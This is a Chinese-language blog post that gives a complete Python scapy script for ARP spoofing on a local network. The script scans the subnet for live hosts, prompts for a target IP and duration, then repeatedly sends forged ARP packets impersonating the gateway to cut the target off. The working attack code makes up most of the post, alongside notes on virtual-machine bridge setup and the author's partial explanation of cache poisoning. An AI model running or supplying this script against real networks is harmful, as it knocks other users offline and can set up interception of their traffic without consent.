局域网内网络阻断小代码

思路

Python来实现
1.获得当前ip及网关–>route print
2.封装arp数据包，以太网的包结构形式来发起ping，得到存活主机列表
3.得到存活主机列表
4.选择需要攻击或阻网的ip
5.设置攻击时长
6.arp攻击(封包、发包)

代码实现

直接上代码吧，感觉没什么好说的。
这里代码是参考了好多个博客总结了一下代码。但是不太清楚原理，又但是可以实现网络阻断的功能

不行，还不能现在就上代码，还得说明一下虚拟机的网络配置模式。
这里需要用到桥接模式，直接改过来就好了。
菜鸡一开始不太会修改网络模式，结果改成桥接ping不通了，，真tm气人啊，搞了一中午，(我的午觉没有了)
也不知道怎么弄得，虚拟机防火墙给阻了，所以从物理机ping不通虚拟机，，，

---

6.28更新：好像知道怎么个原理了，是在本机发送数据报给pdst，告诉它自己就是psrc(网关)，这样一直发，把原本正常的arp缓存给顶出去，所以自己成了目标靶机的网关了。

---

虚拟机桥接前后扫描到的局域网ip

废话说完了，代码贴上来

import os
import time
from scapy.all import *

def scanSpoof():
    netCard = 'xxxxx # 攻击的网卡,我这里是用的无线的网卡
    cmdCode = 'route print' # 查看路由情况的cmd命令

    # 执行cmd命令，获得当前主机的ip和网关
    for line in os.popen(cmdCode):
        # 通过line获得ip和网关
        s = line.strip()
        # print(s)
        if s.startswith('0.0.0.0'):
            ipList = s.split()
            gw = ipList[2] # 网关
            ip = ipList[3] # 当前ip
            # print('ip: ' + ip)
            # print('gw: ' + gw)
            break
    print("使用的网卡是: %s" % netCard)
    print("本机上网ip是: %s" % ip)
    print("上网网关是: %s" % gw)


    # 封装一个arp数据包，符合以太网的包定义
    arpPk = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=gw+"/24")   # Ether用于构造数据包
    # srp 函数用于发送和接受第二层的数据包(Ethernet等)
    ansip, unansip = srp(arpPk, iface=netCard, timeout=2, verbose=0)
    print("扫描到%s台在线主机" % len(ansip))
    print("扫描到%s台不在线主机" % len(unansip))

    resIp = []
    for s, r in ansip:
        resIp.append([r.psrc, r.hwsrc]) # ip, mac
    resIp.sort();   # 去重+排序
    
    for ip, mac in resIp:
        print("%s--->%s" % (ip, mac))

    # 代理/抓包
    # 阻断网络
    targetIp = input("输入需要攻击的ip:")
    targetTime = int(input("输入需要攻击的时间(秒):"))
    # 实现arp攻击
    for i in range(targetTime*10):
        # 不太清楚这里为什么可以实现阻断网络的效果
        sendp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=targetIp, psrc=gw), verbose=0)
        time.sleep(0.1)
    print("对%s的arp攻击完成" % targetIp)

if __name__ == '__main__':
    scanSpoof()

好吧，我承认了，这是抄的铁三的代码